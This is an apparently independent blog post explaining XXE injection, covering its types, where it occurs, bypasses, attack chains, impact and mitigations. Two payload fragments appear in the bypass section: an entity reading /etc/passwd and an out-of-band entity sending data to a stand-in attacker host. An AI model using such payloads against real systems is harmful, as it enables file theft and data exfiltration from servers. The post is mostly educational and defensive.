External Entity Injection (XXE)

sanket narawadesanket narawade
3 min read

What is XXE ? , What are the different types of XXE ? ,Different areas in the application can find XXE?, Bypasses , What are the vulnerability chain with XXE ?, What is there impact and mitigation ?

Defination

It is a vulnerability where allow an attacker to interfare within application’s processing of XML Data by injecting malicious external entity.

Types of XXE

  1. in-band XXE : When attacker sends the attack and recieve the response in same channel , Example : direct HTTP request and response.

  2. Out-of-band XXE : When an attacker sends the attack and recieve the response in different resource controlled by the attacker , Example : When an attacker sends a direct request to the web server to send a sensitive file to the attacker’s own web server.

  3. Blind XXE : When an attacker sends a direct request but not getting any response directly. Instead they observe the behaviour of the vulnerable web application to determine whether attack is succesful or not. Example ( By seeing Error Message ).

Different areas in the web application to find XXE

  1. File upload : Application allow an attacker to upload a file. especially when it accpets XXE files can be vulnerable to XXE.

  2. API Endpoints : Many web applications using an api for communication and using XML for transfering data . If input is not properly sanitized it is vulnerable to XXE.

  3. Form Data : If application has form and accepts XML input vulnerable to XXE.

  4. PDF Generator : If application has functionality to download PDF change the Content-Type to XML and upload the Malicious XXE Payload.

  5. Third Party libraries : If an application is using Third Party library for data communication. If application is accepting XML input .Vulnerbale to XXE attack.

Bypasses for XXE

  1. Encoding Character: Used a Payload Encode (Base 64,Unicode,Octal,Hex) all the character.

  2. Parameter Entites : Instead of using external entity attacker used parameter entity to reference external entites indirectly. Example ( <!ENTITY %file SYSTEM ‘file://etc/passwd‘).

  3. Custom Protocol : If an attacker used ( “FTP“ , “http“ , “file“ , ”gophor” ) protocol. to reference external entity.

  4. Out-of-band-interaction : Attacker inject entites that reference external server under attacker control. Example ( <!ENTITY xxe SYSTEM ‘http://eveil.com/steal?data=).

Chain with XXE

  1. File Disclosure : Attacker inject the malicious payload and get the data from Sensitive file like “/etc/passwd“ , “Config files“ ,”.env” file.

  2. Server-Side-Request-Forgery : Attacker inject malicious payload and make request to the internal server to get details ( Meta-Data , Admin panel , Port Scanning).

  3. Command Injection / Remote Code Execution : Some XML parser allow an Custom Proctocol like (PHP:// , jar:// , expect://) Load the malicious script.

  4. Exfiltration : If an attacker put the “Reverse Shell“ payload to the application , response is send to the attacker control server

Impact

  1. Sensitive Data Exposure : Access the sensitive files on the server file system. Extraction of configuration files and credentials.

  2. Denial of Service : Attacker sends a multiple request as result “Resource exhasution“ and “Network bandwidth depletion“.

Mitigation

  1. Disable DTDs and External Entity Processing.

  2. Whitelist schema and Namespace sources.

  3. Use Secure , hardened XML parser.

  4. Proper Input validation and boundry check.

  5. Chcek the unusal HTTP traffic (out of band interaction)

  6. Insted of using XML data use JSON which is less vulnerable.

0
Subscribe to my newsletter

Read articles from sanket narawade directly inside your inbox. Subscribe to the newsletter, and don't miss out.

blind XXExxe

Written by

sanket narawade
sanket narawade